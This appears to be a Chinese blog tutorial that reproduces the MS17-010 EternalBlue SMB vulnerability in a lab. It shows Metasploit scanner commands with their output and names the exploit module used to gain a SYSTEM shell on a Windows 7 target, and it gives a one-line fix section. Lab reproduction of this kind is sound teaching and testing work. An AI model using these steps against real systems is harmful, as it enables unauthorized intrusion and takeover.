手把手教你如何复现MS17-010永恒之蓝漏洞

漏洞简介

永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞原理

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

漏洞环境复现

名称系统版本IP地址
攻击机5.10.0-kali3-amd64192.168.153.57
靶机win7 64 旗舰版 6.1.7601192.168.153.71

漏洞复现

1、在kali终端上输入msfconsole,进入msf命令行。
在这里插入图片描述2、搜索MS17-010相关模板库。
在这里插入图片描述3、使用auxiliary/scanner/smb/smb_ms17_010模块扫描,靶机是否存在该漏洞。执行 use 1或者use auxiliary/scanner/smb/smb_ms17_010,进入该模块命令行下。

msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > 

4、使用show options查看具体参数设置,
在这里插入图片描述5、设置RHOSTS的值,该值是靶机的IP地址。

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.153.71
RHOSTS => 192.168.153.71
msf6 auxiliary(scanner/smb/smb_ms17_010) > 

6、执行run命令,开始扫描漏洞。

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.153.71:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.153.71:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > 

以上说明这台win7存在MS17-010的漏洞。

7、调用exploit模块进行渗透。执行 use exploit/windows/smb/ms17_010_eternalblueuse 2
在这里插入图片描述8、查看该模块的具体参数并设置必要参数。
在这里插入图片描述9、执行run方法,进行渗透。
在这里插入图片描述

出现以上内容说明已经成功拿到靶机的最高权限了。

10、执行shell,查看靶机IP地址.
在这里插入图片描述

由于windows和linux的编码不一样导致乱码,可以通过执行chcp 65001解决乱码。另外我们可以通过background 把建立的连接后台运行,后续想用的时候,通过sessions -i 进行号调用。

在这里插入图片描述

漏洞修复

定期打补丁

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

didiplus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值